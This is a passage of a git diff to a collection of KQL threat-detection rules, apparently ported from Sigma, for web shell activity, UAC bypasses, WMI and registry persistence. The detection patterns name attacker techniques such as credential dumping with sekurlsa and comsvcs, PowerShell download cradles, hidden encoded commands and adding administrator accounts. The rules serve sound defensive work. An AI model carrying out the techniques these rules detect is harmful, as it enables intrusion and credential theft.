parameters often used during reconnaissance activity via web shells +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 + +DeviceProcessEvents | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql index 1434620c..cd01bc5b 100644 --- a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql +++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql @@ -1,12 +1,12 @@ -// Title: Webshell Hacking Activity Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-17 -// Level: high -// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Webshell Hacking Activity Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: high +// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql index 839d3e99..1daff42d 100644 --- a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql +++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql @@ -1,10 +1,10 @@ -// Title: Webshell Tool Reconnaissance Activity -// Author: Cian Heasley, Florian Roth (Nextron Systems) -// Date: 2020-07-22 -// Level: high -// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003 - -DeviceProcessEvents +// Title: Webshell Tool Reconnaissance Activity +// Author: Cian Heasley, Florian Roth (Nextron Systems) +// Date: 2020-07-22 +// Level: high +// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 + +DeviceProcessEvents | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help") \ No newline at end of file diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql index 6eda5468..546b5770 100644 --- a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql +++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql @@ -1,14 +1,14 @@ -// Title: Winlogon AllowMultipleTSSessions Enable -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: medium -// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. -// Which allows for multiple Remote Desktop connection sessions to be opened at once. -// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate use of the multi session functionality - -DeviceRegistryEvents +// Title: Winlogon AllowMultipleTSSessions Enable +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. +// Which allows for multiple Remote Desktop connection sessions to be opened at once. +// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of the multi session functionality + +DeviceRegistryEvents | where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql index 079f9503..7945b485 100644 --- a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql +++ b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql @@ -1,13 +1,13 @@ -// Title: WMI Persistence - Script Event Consumer -// Author: Thomas Patzke -// Date: 2018-03-07 -// Level: medium -// Description: Detects WMI script event consumers -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 -// False Positives: -// - Legitimate event consumers -// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button - -DeviceProcessEvents +// Title: WMI Persistence - Script Event Consumer +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: medium +// Description: Detects WMI script event consumers +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 +// False Positives: +// - Legitimate event consumers +// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button + +DeviceProcessEvents | where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/Persistence/wmi_persistence_security.kql index 2deec1c8..7a92d7b3 100644 --- a/KQL/rules/Persistence/wmi_persistence_security.kql +++ b/KQL/rules/Persistence/wmi_persistence_security.kql @@ -1,12 +1,12 @@ -// Title: WMI Persistence - Security -// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community -// Date: 2017-08-22 -// Level: medium -// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 -// False Positives: -// - Unknown (data set is too small; further testing needed) - -DeviceRegistryEvents +// Title: WMI Persistence - Security +// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community +// Date: 2017-08-22 +// Level: medium +// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 +// False Positives: +// - Unknown (data set is too small; further testing needed) + +DeviceRegistryEvents | where RegistryKey contains "subscription" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql index 9b430f8c..f670f907 100644 --- a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql +++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql @@ -1,11 +1,11 @@ -// Title: Add Port Monitor Persistence in Registry -// Author: frack113 -// Date: 2021-12-30 -// Level: medium -// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. -// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 - -DeviceRegistryEvents +// Title: Add Port Monitor Persistence in Registry +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. +// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents | where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql index 9f38fa73..ee4e890d 100644 --- a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql +++ b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql @@ -1,10 +1,10 @@ -// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-28 -// Level: high -// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 - -DeviceProcessEvents +// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents | where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql index b7df7feb..20c6db50 100644 --- a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql +++ b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql @@ -1,12 +1,12 @@ -// Title: Atbroker Registry Change -// Author: Mateusz Wydra, oscd.community -// Date: 2020-10-13 -// Level: medium -// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547 -// False Positives: -// - Creation of non-default, legitimate at usage - -DeviceRegistryEvents +// Title: Atbroker Registry Change +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547 +// False Positives: +// - Creation of non-default, legitimate at usage + +DeviceRegistryEvents | where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql index 6a8ba99c..a5785617 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql @@ -1,10 +1,10 @@ -// Title: Bypass UAC Using DelegateExecute -// Author: frack113 -// Date: 2022-01-05 -// Level: high -// Description: Bypasses User Account Control using a fileless method -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceRegistryEvents +// Title: Bypass UAC Using DelegateExecute +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Bypasses User Account Control using a fileless method +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql index 0ba67225..e724e999 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql @@ -1,10 +1,10 @@ -// Title: Bypass UAC Using Event Viewer -// Author: frack113 -// Date: 2022-01-05 -// Level: high -// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 - -DeviceRegistryEvents +// Title: Bypass UAC Using Event Viewer +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents | where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql index 150fd39b..695c79b7 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql @@ -1,12 +1,12 @@ -// Title: Bypass UAC Using SilentCleanup Task -// Author: frack113, Nextron Systems -// Date: 2022-01-06 -// Level: high -// Description: Detects the setting of the environement variable "windir" to a non default value. -// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. -// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceRegistryEvents +// Title: Bypass UAC Using SilentCleanup Task +// Author: frack113, Nextron Systems +// Date: 2022-01-06 +// Level: high +// Description: Detects the setting of the environement variable "windir" to a non default value. +// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. +// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents | where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql index 8d614901..9f088b8a 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql @@ -1,12 +1,12 @@ -// Title: Bypass UAC via CMSTP -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003 -// False Positives: -// - Legitimate use of cmstp.exe utility by legitimate user - -DeviceProcessEvents +// Title: Bypass UAC via CMSTP +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003 +// False Positives: +// - Legitimate use of cmstp.exe utility by legitimate user + +DeviceProcessEvents | where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql index 3ecc9937..5f35acbd 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql @@ -1,12 +1,12 @@ -// Title: Bypass UAC via WSReset.exe -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth -// Date: 2019-10-24 -// Level: high -// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 -// False Positives: -// - Unknown sub processes of Wsreset.exe - -DeviceProcessEvents +// Title: Bypass UAC via WSReset.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth +// Date: 2019-10-24 +// Level: high +// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Unknown sub processes of Wsreset.exe + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql index 4514039e..deff9744 100644 --- a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql +++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql @@ -1,11 +1,11 @@ -// Title: Change Default File Association To Executable Via Assoc -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects when a program changes the default file association of any extension to an executable. -// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 - -DeviceProcessEvents +// Title: Change Default File Association To Executable Via Assoc +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects when a program changes the default file association of any extension to an executable. +// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql index d54b7eed..337598da 100644 --- a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql +++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql @@ -1,13 +1,13 @@ -// Title: Change Default File Association Via Assoc -// Author: Timur Zinniatullin, oscd.community -// Date: 2019-10-21 -// Level: low -// Description: Detects file association changes using the builtin "assoc" command. -// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 -// False Positives: -// - Admin activity - -DeviceProcessEvents +// Title: Change Default File Association Via Assoc +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects file association changes using the builtin "assoc" command. +// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 +// False Positives: +// - Admin activity + +DeviceProcessEvents | where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql index 7f8d9a58..d31c066e 100644 --- a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql +++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Changing Existing Service ImagePath Value Via Reg.EXE -// Author: frack113 -// Date: 2021-12-30 -// Level: medium -// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. -// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. -// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011 - -DeviceProcessEvents +// Title: Changing Existing Service ImagePath Value Via Reg.EXE +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. +// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. +// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011 + +DeviceProcessEvents | where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql index 6cf0b25b..f4f97bdf 100644 --- a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Classes Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: 